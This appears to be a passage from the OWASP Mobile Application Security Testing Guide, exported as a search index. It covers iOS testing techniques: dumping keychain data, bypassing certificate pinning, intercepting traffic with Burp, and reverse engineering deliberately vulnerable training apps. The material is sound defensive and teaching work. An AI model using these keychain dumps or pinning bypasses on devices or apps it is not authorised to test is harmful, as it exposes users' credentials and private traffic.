OWASP.iGoat-Swift on (iPhone: 11.1.2) [usb] # ls\nNSFileType Perms NSFileProtection ... Name\n------------ ------- ------------------ ... ----------------------------\nDirectory 493 None ... Realm.framework\nRegular 420 None ... libswiftCore.dylib\nRegular 420 None ... libswiftCoreData.dylib\nRegular 420 None ... libswiftCoreFoundation.dylib\n...\n
Please note that this might not be the complete list of native code elements being used by the app as some can be part of the source code, meaning that they'll be compiled in the app binary and therefore cannot be found as standalone libraries or Frameworks in the Frameworks
folder.
For now this is all information you can get about the Frameworks unless you start reverse engineering them. Refer to the chapter Tampering and Reverse Engineering on iOS for more information about how to reverse engineer Frameworks.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0058/#other-app-resources","title":"Other App Resources","text":"It is normally worth taking a look at the rest of the resources and files that you may find in the Application Bundle (.app) inside the IPA as some times they contain additional goodies like encrypted databases, certificates, etc.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0059/","title":"Accessing App Data Directories","text":"Once you have installed the app, there is further information to explore. Let's go through a short overview of the app folder structure on iOS apps to understand which data is stored where. The following illustration represents the application folder structure:
On iOS, system applications can be found in the /Applications
directory while user-installed apps are available under /private/var/containers/
. However, finding the right folder just by navigating the file system is not a trivial task as every app gets a random 128-bit UUID (Universal Unique Identifier) assigned for its directory names.
In order to easily obtain the installation directory information for user-installed apps you can follow the following methods:
Connect to the terminal on the device and run the command ipainstaller
(IPA Installer Console) as follows:
iPhone:~ root# ipainstaller -l\n...\nOWASP.iGoat-Swift\n\niPhone:~ root# ipainstaller -i OWASP.iGoat-Swift\n...\nBundle: /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67\nApplication: /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app\nData: /private/var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693\n
Using objection's command env
will also show you all the directory information of the app. Connecting to the application with objection is described in the section \"Recommended Tools - Objection\".
OWASP.iGoat-Swift on (iPhone: 11.1.2) [usb] # env\n\nName Path\n----------------- -------------------------------------------------------------------------------------------\nBundlePath /var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app\nCachesDirectory /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Library/Caches\nDocumentDirectory /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Documents\nLibraryDirectory /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Library\n
As you can see, apps have two main locations:
/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/
)./var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/
).These folders contain information that must be examined closely during application security assessments (for example when analyzing the stored data for sensitive data).
Bundle directory:
Data directory:
NSURLIsExcludedFromBackupKey
.Application Support
and Caches
subdirectories, but the app can create custom subdirectories.NSURLIsExcludedFromBackupKey
.NSUserDefaults
can be found in this file.Let's take a closer look at iGoat-Swift's Application Bundle (.app) directory inside the Bundle directory (/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app
):
OWASP.iGoat-Swift on (iPhone: 11.1.2) [usb] # ls\nNSFileType Perms NSFileProtection ... Name\n------------ ------- ------------------ ... --------------------------------------\nRegular 420 None ... rutger.html\nRegular 420 None ... mansi.html\nRegular 420 None ... splash.html\nRegular 420 None ... about.html\n\nRegular 420 None ... LICENSE.txt\nRegular 420 None ... Sentinel.txt\nRegular 420 None ... README.txt\n\nDirectory 493 None ... URLSchemeAttackExerciseVC.nib\nDirectory 493 None ... CutAndPasteExerciseVC.nib\nDirectory 493 None ... RandomKeyGenerationExerciseVC.nib\nDirectory 493 None ... KeychainExerciseVC.nib\nDirectory 493 None ... CoreData.momd\nRegular 420 None ... archived-expanded-entitlements.xcent\nDirectory 493 None ... SVProgressHUD.bundle\n\nDirectory 493 None ... Base.lproj\nRegular 420 None ... Assets.car\nRegular 420 None ... PkgInfo\nDirectory 493 None ... _CodeSignature\nRegular 420 None ... AppIcon60x60@3x.png\n\nDirectory 493 None ... Frameworks\n\nRegular 420 None ... embedded.mobileprovision\n\nRegular 420 None ... Credentials.plist\nRegular 420 None ... Assets.plist\nRegular 420 None ... Info.plist\n\nRegular 493 None ... iGoat-Swift\n
You can also visualize the Bundle directory from Grapefruit by clicking on Finder -> Bundle:
Including the Info.plist
file:
As well as the Data directory in Finder -> Home:
Refer to the Testing Data Storage chapter for more information and best practices on securely storing sensitive data.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0060/","title":"Monitoring System Logs","text":"Many apps log informative (and potentially sensitive) messages to the console log. The log also contains crash reports and other useful information. You can collect console logs through the Xcode Devices window as follows:
To save the console output to a text file, go to the top right side of the Console window and click on the Save button.
You can also connect to the device shell as explained in Accessing the Device Shell, install socat via apt-get and run the following command:
iPhone:~ root# socat - UNIX-CONNECT:/var/run/lockdown/syslog.sock\n\n========================\nASL is here to serve you\n> watch\nOK\n\nJun 7 13:42:14 iPhone chmod[9705] <Notice>: MS:Notice: Injecting: (null) [chmod] (1556.00)\nJun 7 13:42:14 iPhone readlink[9706] <Notice>: MS:Notice: Injecting: (null) [readlink] (1556.00)\nJun 7 13:42:14 iPhone rm[9707] <Notice>: MS:Notice: Injecting: (null) [rm] (1556.00)\nJun 7 13:42:14 iPhone touch[9708] <Notice>: MS:Notice: Injecting: (null) [touch] (1556.00)\n...\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0061/","title":"Dumping KeyChain Data","text":"Dumping the KeyChain data can be done with multiple tools, but not all of them will work on any iOS version. As is more often the case, try the different tools or look up their documentation for information on the latest supported versions.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0061/#objection-jailbroken-non-jailbroken","title":"Objection (Jailbroken / non-Jailbroken)","text":"The KeyChain data can easily be viewed using Objection. First, connect objection to the app as described in \"Recommended Tools - Objection\". Then, use the ios keychain dump
command to get an overview of the keychain:
$ objection --gadget=\"iGoat-Swift\" explore\n... [usb] # ios keychain dump\n...\nNote: You may be asked to authenticate using the devices passcode or TouchID\nSave the output by adding `--json keychain.json` to this command\nDumping the iOS keychain...\nCreated Accessible ACL Type Account Service Data\n------------------------- ------------------------------ ----- -------- ------------------- -------------------------- ----------------------------------------------------------------------\n2019-06-06 10:53:09 +0000 WhenUnlocked None Password keychainValue com.highaltitudehacks.dvia mypassword123\n2019-06-06 10:53:30 +0000 WhenUnlockedThisDeviceOnly None Password SCAPILazyVector com.toyopagroup.picaboo (failed to decode)\n2019-06-06 10:53:30 +0000 AfterFirstUnlockThisDeviceOnly None Password fideliusDeviceGraph com.toyopagroup.picaboo (failed to decode)\n2019-06-06 10:53:30 +0000 AfterFirstUnlockThisDeviceOnly None Password SCDeviceTokenKey2 com.toyopagroup.picaboo 00001:FKsDMgVISiavdm70v9Fhv5z+pZfBTTN7xkwSwNvVr2IhVBqLsC7QBhsEjKMxrEjh\n2019-06-06 10:53:30 +0000 AfterFirstUnlockThisDeviceOnly None Password SCDeviceTokenValue2 com.toyopagroup.picaboo CJ8Y8K2oE3rhOFUhnxJxDS1Zp8Z25XzgY2EtFyMbW3U=\nOWASP.iGoat-Swift on (iPhone: 12.0) [usb] # quit \n
Note that currently, the latest versions of frida-server and objection do not correctly decode all keychain data. Different combinations can be tried to increase compatibility. For example, the previous printout was created with frida-tools==1.3.0
, frida==12.4.8
and objection==1.5.0
.
Finally, since the keychain dumper is executed from within the application context, it will only print out keychain items that can be accessed by the application and not the entire keychain of the iOS device.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0061/#grapefruit-jailbroken-non-jailbroken","title":"Grapefruit (Jailbroken / non-Jailbroken)","text":"With Grapefruit it's possible to access the keychain data of the app you have selected. Inside the Storage section, click on Keychain and you can see a listing of the stored Keychain information.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0061/#keychain-dumper-jailbroken","title":"Keychain-dumper (Jailbroken)","text":"You can use Keychain-dumper dump the jailbroken device's KeyChain contents. Once you have it running on your device:
iPhone:~ root# /tmp/keychain_dumper\n\n(...)\n\nGeneric Password\n----------------\nService: myApp\nAccount: key3\nEntitlement Group: RUD9L355Y.sg.vantagepoint.example\nLabel: (null)\nGeneric Field: (null)\nKeychain Data: SmJSWxEs\n\nGeneric Password\n----------------\nService: myApp\nAccount: key7\nEntitlement Group: RUD9L355Y.sg.vantagepoint.example\nLabel: (null)\nGeneric Field: (null)\nKeychain Data: WOg1DfuH\n
In newer versions of iOS (iOS 11 and up), additional steps are necessary. See the README.md for more details. Note that this binary is signed with a self-signed certificate that has a \"wildcard\" entitlement. The entitlement grants access to all items in the Keychain. If you are paranoid or have very sensitive private data on your test device, you may want to build the tool from source and manually sign the appropriate entitlements into your build; instructions for doing this are available in the GitHub repository.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0062/","title":"Basic Network Monitoring/Sniffing","text":"You can remotely sniff all traffic in real-time on iOS by creating a Remote Virtual Interface for your iOS device. First make sure you have Wireshark installed on your macOS host computer.
$ rvictl -s <UDID>\nStarting device <UDID> [SUCCEEDED] with interface rvi0\n
ip.addr == 192.168.1.1 && http\n
The documentation of Wireshark offers many examples for Capture Filters that should help you to filter the traffic to get the information you want.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0063/","title":"Setting up an Interception Proxy","text":"Burp Suite is an integrated platform for security testing mobile and web applications. Its tools work together seamlessly to support the entire testing process, from initial mapping and analysis of attack surfaces to finding and exploiting security vulnerabilities. Burp Proxy operates as a web proxy server for Burp Suite, which is positioned as a man-in-the-middle between the browser and web server(s). Burp Suite allows you to intercept, inspect, and modify incoming and outgoing raw HTTP traffic.
Setting up Burp to proxy your traffic is pretty straightforward. We assume that both your iOS device and host computer are connected to a Wi-Fi network that permits client-to-client traffic. If client-to-client traffic is not permitted, you can use usbmuxd to connect to Burp via USB.
PortSwigger provides a good tutorial on setting up an iOS device to work with Burp and a tutorial on installing Burp's CA certificate to an iOS device.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0063/#using-burp-via-usb-on-a-jailbroken-device","title":"Using Burp via USB on a Jailbroken Device","text":"In the section Accessing the Device Shell we've already learned how we can use iproxy to use SSH via USB. When doing dynamic analysis, it's interesting to use the SSH connection to route our traffic to Burp that is running on our computer. Let's get started:
First we need to use iproxy to make SSH from iOS available on localhost.
$ iproxy 2222 22\nwaiting for connection\n
The next step is to make a remote port forwarding of port 8080 on the iOS device to the localhost interface on our computer to port 8080.
ssh -R 8080:localhost:8080 root@localhost -p 2222\n
You should now be able to reach Burp on your iOS device. Open Safari on iOS and go to 127.0.0.1:8080 and you should see the Burp Suite Page. This would also be a good time to install the CA certificate of Burp on your iOS device.
The last step would be to set the proxy globally on your iOS device:
Open Safari and go to any webpage, you should see now the traffic in Burp. Thanks @hweisheimer for the initial idea!
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0064/","title":"Bypassing Certificate Pinning","text":"Some applications will implement SSL Pinning, which prevents the application from accepting your intercepting certificate as a valid certificate. This means that you will not be able to monitor the traffic between the application and the server.
For most applications, certificate pinning can be bypassed within seconds, but only if the app uses the API functions that are covered by these tools. If the app is implementing SSL Pinning with a custom framework or library, the SSL Pinning must be manually patched and deactivated, which can be time-consuming.
This section describes various ways to bypass SSL Pinning and gives guidance about what you should do when the existing tools don't work.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0064/#methods-for-jailbroken-and-non-jailbroken-devices","title":"Methods for Jailbroken and Non-jailbroken Devices","text":"If you have a jailbroken device with frida-server installed, you can bypass SSL pinning by running the following Objection command (repackage your app if you're using a non-jailbroken device):
ios sslpinning disable\n
Here's an example of the output:
See also Objection's help on Disabling SSL Pinning for iOS for further information and inspect the pinning.ts file to understand how the bypass works.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0064/#methods-for-jailbroken-devices-only","title":"Methods for Jailbroken Devices Only","text":"If you have a jailbroken device you can try one of the following tools that can automatically disable SSL Pinning:
Technologies and systems change over time, and some bypass techniques might not work eventually. Hence, it's part of the tester work to do some research, since not every tool is able to keep up with OS versions quickly enough.
Some apps might implement custom SSL pinning methods, so the tester could also develop new bypass scripts making use of existing ones as a base or inspiration and using similar techniques but targeting the app's custom APIs. Here you can inspect three good examples of such scripts:
Other Techniques:
If you don't have access to the source, you can try binary patching:
NSURLSession
, CFStream
, and AFNetworking
and methods/strings containing words like \"pinning\", \"X.509\", \"Certificate\", etc.iOS reverse engineering is a mixed bag. On one hand, apps programmed in Objective-C and Swift can be disassembled nicely. In Objective-C, object methods are called via dynamic function pointers called \"selectors\", which are resolved by name during runtime. The advantage of runtime name resolution is that these names need to stay intact in the final binary, making the disassembly more readable. Unfortunately, this also means that no direct cross-references between methods are available in the disassembler and constructing a flow graph is challenging.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0065/#references","title":"References","text":"The preferred method of statically analyzing iOS apps involves using the original Xcode project files. Ideally, you will be able to compile and debug the app to quickly identify any potential issues with the source code.
Black box analysis of iOS apps without access to the original source code requires reverse engineering. For example, no decompilers are available for iOS apps (although most commercial and open-source disassemblers can provide a pseudo-source code view of the binary), so a deep inspection requires you to read assembly code.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0067/","title":"Dynamic Analysis on iOS","text":"Life is easy with a jailbroken device: not only do you gain easy privileged access to the device, the lack of code signing allows you to use more powerful dynamic analysis techniques. On iOS, most dynamic analysis tools are based on Cydia Substrate, a framework for developing runtime patches, or Frida, a dynamic introspection tool. For basic API monitoring, you can get away with not knowing all the details of how Substrate or Frida work - you can simply use existing API monitoring tools.
On iOS, collecting basic information about a running process or an application can be slightly more challenging than compared to Android. On Android (or any Linux-based OS), process information is exposed as readable text files via procfs. Thus, any information about a target process can be obtained on a rooted device by parsing these text files. In contrast, on iOS there is no procfs equivalent present. Also, on iOS many standard UNIX command line tools for exploring process information, for instance lsof and vmmap, are removed to reduce the firmware size.
In this section, we will learn how to collect process information on iOS using command line tools like lsof. Since many of these tools are not present on iOS by default, we need to install them via alternative methods. For instance, lsof can be installed using Cydia (the executable is not the latest version available, but nevertheless addresses our purpose).
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0068/","title":"Disassembling Native Code","text":"Because Objective-C and Swift are fundamentally different, the programming language in which the app is written affects the possibilities for reverse engineering it. For example, Objective-C allows method invocations to be changed at runtime. This makes hooking into other app functions (a technique heavily used by Cycript and other reverse engineering tools) easy. This \"method swizzling\" is not implemented the same way in Swift, and the difference makes the technique harder to execute with Swift than with Objective-C.
On iOS, all the application code (both Swift and Objective-C) is compiled to machine code (e.g. ARM). Thus, to analyze iOS applications a disassembler is needed.
If you want to disassemble an application from the App Store, remove the Fairplay DRM first. Section \"Acquiring the App Binary\" in the chapter \"iOS Basic Security Testing\" explains how.
In this section the term \"app binary\" refers to the Macho-O file in the application bundle which contains the compiled code, and should not be confused with the application bundle - the IPA file. See section \"Exploring the App Package\" in chapter \"Basic iOS Security Testing\" for more details on the composition of IPA files.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0068/#disassembling-with-ida-pro","title":"Disassembling With IDA Pro","text":"If you have a license for IDA Pro, you can analyze the app binary using IDA Pro as well.
The free version of IDA unfortunately does not support the ARM processor type.
To get started, simply open the app binary in IDA Pro.
Upon opening the file, IDA Pro will perform auto-analysis, which can take a while depending on the size of the binary. Once the auto-analysis is completed you can browse the disassembly in the IDA View (Disassembly) window and explore functions in the Functions window, both shown in the screenshot below.
A regular IDA Pro license does not include a decompiler by default and requires an additional license for the Hex-Rays decompiler, which is expensive. In contrast, Ghidra comes with a very capable free builtin decompiler, making it a compelling alternative to use for reverse engineering.
If you have a regular IDA Pro license and do not want to buy the Hex-Rays decompiler, you can use Ghidra's decompiler by installing the GhIDA plugin for IDA Pro.
The majority of this chapter applies to applications written in Objective-C or having bridged types, which are types compatible with both Swift and Objective-C. The Swift compatibility of most tools that work well with Objective-C is being improved.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0069/","title":"Decompiling Native Code","text":"TODO. Hopper is only mentioned once in the entire document, ghidra is only used for disassembly, ... We can expand this, maybe add some good ghidra snippets for objective-c mapping, ...
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0070/","title":"Extracting Information from the Application Binary","text":"You can use radare to get information about the binary, such as the architecture, the list of shared libraries, the list of classes and methods, strings and more.
Let's use the Damn Vulnerable iOS App DVIA v1 as an example. Open its main binary with radare2:
r2 DamnVulnerableIOSApp\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0070/#binary-information","title":"Binary Information","text":"To get information about the binary, you can use the i
command. This command will list information about the binary, such as the architecture, the list of shared libraries, the list of classes and methods, strings and more.
[0x1000180c8]> i\n...\nsize 0x43d5f0\nhumansz 4.2M\nmode r-x\nformat mach064\niorw false\nblock 0x100\npacket xtr.fatmach0\n...\nlang objc with blocks\nlinenum false\nlsyms false\nnx false\nos ios\npic true\nrelocs true\nsanitize false\nstatic false\nstripped true\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0070/#classes-and-methods","title":"Classes and Methods","text":"And then we can proceed to extract information about the methods in the application's source code. To do this, we need to load the application binary into radare and then list the classes and methods in the binary.
[0x1000180c8]> icc\n\n...\n\n@interface SFAntiPiracy : NSObject\n{\n}\n+ (int) isPirated\n+ (int) isJailbroken\n+ (void) killApplication\n+ (bool) isTheDeviceJailbroken\n+ (bool) isTheApplicationCracked\n+ (bool) isTheApplicationTamperedWith\n+ (int) urlCheck\n...\n@end\n
Note the plus sign, which means that this is a class method that returns a BOOL type. A minus sign would mean that this is an instance method. Refer to later sections to understand the practical difference between these.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0070/#linked-libraries","title":"Linked Libraries","text":"The following command is listing shared libraries:
[0x1000180c8]> il\n[Linked libraries]\n/System/Library/Frameworks/SystemConfiguration.framework/SystemConfiguration\n/System/Library/Frameworks/StoreKit.framework/StoreKit\n/System/Library/Frameworks/Security.framework/Security\n/System/Library/Frameworks/QuartzCore.framework/QuartzCore\n/System/Library/Frameworks/MobileCoreServices.framework/MobileCoreServices\n/usr/lib/libz.1.dylib\n/System/Library/Frameworks/CoreLocation.framework/CoreLocation\n/System/Library/Frameworks/CoreGraphics.framework/CoreGraphics\n/System/Library/Frameworks/CFNetwork.framework/CFNetwork\n/System/Library/Frameworks/AudioToolbox.framework/AudioToolbox\n/System/Library/Frameworks/CoreData.framework/CoreData\n/System/Library/Frameworks/UIKit.framework/UIKit\n/System/Library/Frameworks/Foundation.framework/Foundation\n/usr/lib/libobjc.A.dylib\n/usr/lib/libSystem.B.dylib\n/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation\n\n16 libraries\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0070/#strings","title":"Strings","text":"Obtaining strings is very useful when reverse engineering an app because it can give you a lot of information about the app's functionality. For example, you can find URLs, API endpoints, encryption keys, and more. You can also find strings that will point you to interesting functions, such as the login function or a function that checks whether the device is jailbroken.
[0x1000180c8]> izz~cstring | less\n\n\n29903 0x001d0b4c 0x1001d0b4c 5 6 5.__TEXT.__cstring ascii Admin\n29904 0x001d0b52 0x1001d0b52 13 14 5.__TEXT.__cstring ascii This!sA5Ecret\n29905 0x001d0b60 0x1001d0b60 15 16 5.__TEXT.__cstring ascii pushSuccessPage\n29906 0x001d0b70 0x1001d0b70 4 5 5.__TEXT.__cstring ascii Oops\n29907 0x001d0b75 0x1001d0b75 30 31 5.__TEXT.__cstring ascii Incorrect Username or Password\n29908 0x001d0b94 0x1001d0b94 17 18 5.__TEXT.__cstring ascii usernameTextField\n29909 0x001d0ba6 0x1001d0ba6 39 40 5.__TEXT.__cstring ascii T@\"UITextField\",&,N,V_usernameTextField\n29910 0x001d0bce 0x1001d0bce 17 18 5.__TEXT.__cstring ascii passwordTextField\n...\n29915 0x001d0ca8 0x1001d0ca8 18 19 5.__TEXT.__cstring ascii http://google.com/\n29926 0x001d0d73 0x1001d0d73 37 38 5.__TEXT.__cstring ascii Request Sent using pinning, lookout !\n29927 0x001d0d99 0x1001d0d99 77 78 5.__TEXT.__cstring ascii Certificate validation failed. \n You will have to do better than this, my boy!!\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0071/","title":"Retrieving Strings","text":"Strings are always a good starting point while analyzing a binary, as they provide context to the associated code. For instance, an error log string such as \"Cryptogram generation failed\" gives us a hint that the adjoining code might be responsible for the generation of a cryptogram.
In order to extract strings from an iOS binary, you can use GUI tools such as Ghidra or iaito or rely on CLI-based tools such as the strings Unix utility (strings <path_to_binary>
) or radare2's rabin2 (rabin2 -zz <path_to_binary>
). When using the CLI-based ones you can take advantage of other tools such as grep (e.g. in conjunction with regular expressions) to further filter and analyze the results.
Ghidra can be used for analyzing the iOS binaries and obtaining cross references by right clicking the desired function and selecting Show References to.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0073/","title":"Information Gathering - API Usage","text":"The iOS platform provides many built-in libraries for frequently used functionalities in applications, for example cryptography, Bluetooth, NFC, network and location libraries. Determining the presence of these libraries in an application can give us valuable information about its underlying working.
For instance, if an application is importing the CC_SHA256
function, it indicates that the application will be performing some kind of hashing operation using the SHA256 algorithm. Further information on how to analyze iOS's cryptographic APIs is discussed in the section \"iOS Cryptographic APIs\".
Similarly, the above approach can be used to determine where and how an application is using Bluetooth. For instance, an application performing communication using the Bluetooth channel must use functions from the Core Bluetooth framework such as CBCentralManager
or connect
. Using the iOS Bluetooth documentation you can determine the critical functions and start analysis around those function imports.
Most of the apps you might encounter connect to remote endpoints. Even before you perform any dynamic analysis (e.g. traffic capture and analysis), you can obtain some initial inputs or entry points by enumerating the domains to which the application is supposed to communicate to.
Typically these domains will be present as strings within the binary of the application. One can extract domains by retrieving strings (as discussed above) or checking the strings using tools like Ghidra. The latter option has a clear advantage: it can provide you with context, as you'll be able to see in which context each domain is being used by checking the cross-references.
From here on you can use this information to derive more insights which might be of use later during your analysis, e.g. you could match the domains to the pinned certificates or perform further reconnaissance on domain names to know more about the target environment.
The implementation and verification of secure connections can be an intricate process and there are numerous aspects to consider. For instance, many applications use other protocols apart from HTTP such as XMPP or plain TCP packets, or perform certificate pinning in an attempt to deter MITM attacks.
Remember that in most cases, using only static analysis will not be enough and might even turn out to be extremely inefficient when compared to the dynamic alternatives which will get much more reliable results (e.g. using an interception proxy). In this section we've only touched the surface, so please refer to the section \"Basic Network Monitoring/Sniffing\" in the \"iOS Basic Security Testing\" chapter and check out the test cases in the chapter \"iOS Network Communication\" for further information.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0076/","title":"Reviewing Disassembled Objective-C and Swift Code","text":"In this section we will be exploring iOS application's binary code manually and perform static analysis on it. Manual analysis can be a slow process and requires immense patience. A good manual analysis can make the dynamic analysis more successful.
There are no hard written rules for performing static analysis, but there are few rules of thumb which can be used to have a systematic approach to manual analysis:
Techniques discussed in this section are generic and applicable irrespective of the tools used for analysis.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0076/#objective-c","title":"Objective-C","text":"In addition to the techniques learned in the \"Disassembling and Decompiling\" section, for this section you'll need some understanding of the Objective-C runtime. For instance, functions like _objc_msgSend
or _objc_release
are specially meaningful for the Objective-C runtime.
We will be using the UnCrackable App for iOS Level 1, which has the simple goal of finding a secret string hidden somewhere in the binary. The application has a single home screen and a user can interact via inputting custom strings in the provided text field.
When the user inputs the wrong string, the application shows a pop-up with the \"Verification Failed\" message.
You can keep note of the strings displayed in the pop-up, as this might be helpful when searching for the code where the input is processed and a decision is being made. Luckily, the complexity and interaction with this application is straightforward, which bodes well for our reversing endeavors.
For static analysis in this section, we will be using Ghidra 9.0.4. Ghidra 9.1_beta auto-analysis has a bug and does not show the Objective-C classes.
We can start by checking the strings present in the binary by opening it in Ghidra. The listed strings might be overwhelming at first, but with some experience in reversing Objective-C code, you'll learn how to filter and discard the strings that are not really helpful or relevant. For instance, the ones shown in screenshot below, which are generated for the Objective-C runtime. Other strings might be helpful in some cases, such as those containing symbols (function names, class names, etc.) and we'll be using them when performing static analysis to check if some specific function is being used.
If we continue our careful analysis, we can spot the string, \"Verification Failed\", which is used for the pop-up when a wrong input is given. If you follow the cross-references (Xrefs) of this string, you will reach buttonClick
function of the ViewController
class. We will look into the buttonClick
function later in this section. When further checking the other strings in the application, only a few of them look a likely candidate for a hidden flag. You can try them and verify as well.
Moving forward, we have two paths to take. Either we can start analyzing the buttonClick
function identified in the above step, or start analyzing the application from the various entry points. In real world situation, most times you will be taking the first path, but from a learning perspective, in this section we will take the latter path.
An iOS application calls different predefined functions provided by the iOS runtime depending on its the state within the application life cycle. These functions are known as the entry points of the app. For example:
[AppDelegate application:didFinishLaunchingWithOptions:]
is called when the application is started for the first time.[AppDelegate applicationDidBecomeActive:]
is called when the application is moving from inactive to active state.Many applications execute critical code in these sections and therefore they're normally a good starting point in order to follow the code systematically.
Once we're done with the analysis of all the functions in the AppDelegate
class, we can conclude that there is no relevant code present. The lack of any code in the above functions raises the question - from where is the application's initialization code being called?
Luckily the current application has a small code base, and we can find another ViewController
class in the Symbol Tree view. In this class, function viewDidLoad
function looks interesting. If you check the documentation of viewDidLoad
, you can see that it can also be used to perform additional initialization on views.
If we check the decompilation of this function, there are a few interesting things going on. For instance, there is a call to a native function at line 31 and a label is initialized with a setHidden
flag set to 1 in lines 27-29. You can keep a note of these observations and continue exploring the other functions in this class. For brevity, exploring the other parts of the function is left as an exercise for the readers.
In our first step, we observed that the application verifies the input string only when the UI button is pressed. Thus, analyzing the buttonClick
function is an obvious target. As earlier mentioned, this function also contains the string we see in the pop-ups. At line 29 a decision is being made, which is based on the result of isEqualString
(output saved in uVar1
at line 23). The input for the comparison is coming from the text input field (from the user) and the value of the label
. Therefore, we can assume that the hidden flag is stored in that label.
Now we have followed the complete flow and have all the information about the application flow. We also concluded that the hidden flag is present in a text label and in order to determine the value of the label, we need to revisit viewDidLoad
function, and understand what is happening in the native function identified. Analysis of the native function is discussed in \"Reviewing Disassembled Native Code\".
Analyzing disassembled native code requires a good understanding of the calling conventions and instructions used by the underlying platform. In this section we are looking in ARM64 disassembly of the native code. A good starting point to learn about ARM architecture is available at Introduction to ARM Assembly Basics by Azeria Labs Tutorials. This is a quick summary of the things that we will be using in this section:
As mentioned above as well, Objective-C code is also compiled to native binary code, but analyzing C/C++ native can be more challenging. In case of Objective-C there are various symbols (especially function names) present, which eases the understanding of the code. In the above section we've learned that the presence of function names like setText
, isEqualStrings
can help us in quickly understanding the semantics of the code. In case of C/C++ native code, if all the binaries are stripped, there can be very few or no symbols present to assist us into analyzing it.
Decompilers can help us in analyzing native code, but they should be used with caution. Modern decompilers are very sophisticated and among many techniques used by them to decompile code, a few of them are heuristics based. Heuristics based techniques might not always give correct results, one such case being, determining the number of input parameters for a given native function. Having knowledge of analyzing disassembled code, assisted with decompilers can make analyzing native code less error prone.
We will be analyzing the native function identified in viewDidLoad
function in the previous section. The function is located at offset 0x1000080d4. The return value of this function used in the setText
function call for the label. This text is used to compare against the user input. Thus, we can be sure that this function will be returning a string or equivalent.
The first thing we can see in the disassembly of the function is that there is no input to the function. The registers X0-X7 are not read throughout the function. Also, there are multiple calls to other functions like the ones at 0x100008158, 0x10000dbf0 etc.
The instructions corresponding to one such function calls can be seen below. The branch instruction bl
is used to call the function at 0x100008158.
1000080f0 1a 00 00 94 bl FUN_100008158\n1000080f4 60 02 00 39 strb w0,[x19]=>DAT_10000dbf0\n
The return value from the function (found in W0), is stored to the address in register X19 (strb
stores a byte to the address in register). We can see the same pattern for other function calls, the returned value is stored in X19 register and each time the offset is one more than the previous function call. This behavior can be associated with populating each index of a string array at a time. Each return value is been written to an index of this string array. There are 11 such calls, and from the current evidence we can make an intelligent guess that length of the hidden flag is 11. Towards the end of the disassembly, the function returns with the address to this string array.
100008148 e0 03 13 aa mov x0=>DAT_10000dbf0,x19\n
To determine the value of the hidden flag we need to know the return value of each of the subsequent function calls identified above. When analyzing the function 0x100006fb4, we can observe that this function is much bigger and more complex than the previous one we analyzed. Function graphs can be very helpful when analyzing complex functions, as it helps into better understanding the control flow of the function. Function graphs can be obtained in Ghidra by clicking the Display function graph icon in the sub-menu.
Manually analyzing all the native functions completely will be time consuming and might not be the wisest approach. In such a scenario using a dynamic analysis approach is highly recommended. For instance, by using the techniques like hooking or simply debugging the application, we can easily determine the returned values. Normally it's a good idea to use a dynamic analysis approach and then fallback to manually analyzing the functions in a feedback loop. This way you can benefit from both approaches at the same time while saving time and reducing effort. Dynamic analysis techniques are discussed in \"Dynamic Analysis\" section.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0078/","title":"Automated Static Analysis","text":"Several automated tools for analyzing iOS apps are available; most of them are commercial tools. The free and open source tools MobSF and objection have some static and dynamic analysis functionality. Additional tools are listed in the \"Static Source Code Analysis\" section of the \"Testing Tools\" chapter.
Don't shy away from using automated scanners for your analysis - they help you pick low-hanging fruit and allow you to focus on the more interesting aspects of analysis, such as the business logic. Keep in mind that static analyzers may produce false positives and false negatives; always review the findings carefully.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0079/","title":"Dynamic Analysis on Non-Jailbroken Devices","text":"If you don't have access to a jailbroken device, you can patch and repackage the target app to load a dynamic library at startup (e.g. the Frida gadget to enable dynamic testing with Frida and related tools such as objection). This way, you can instrument the app and do everything you need to do for dynamic analysis (of course, you can't break out of the sandbox this way). However, this technique only works if the app binary isn't FairPlay-encrypted (i.e., obtained from the App Store).
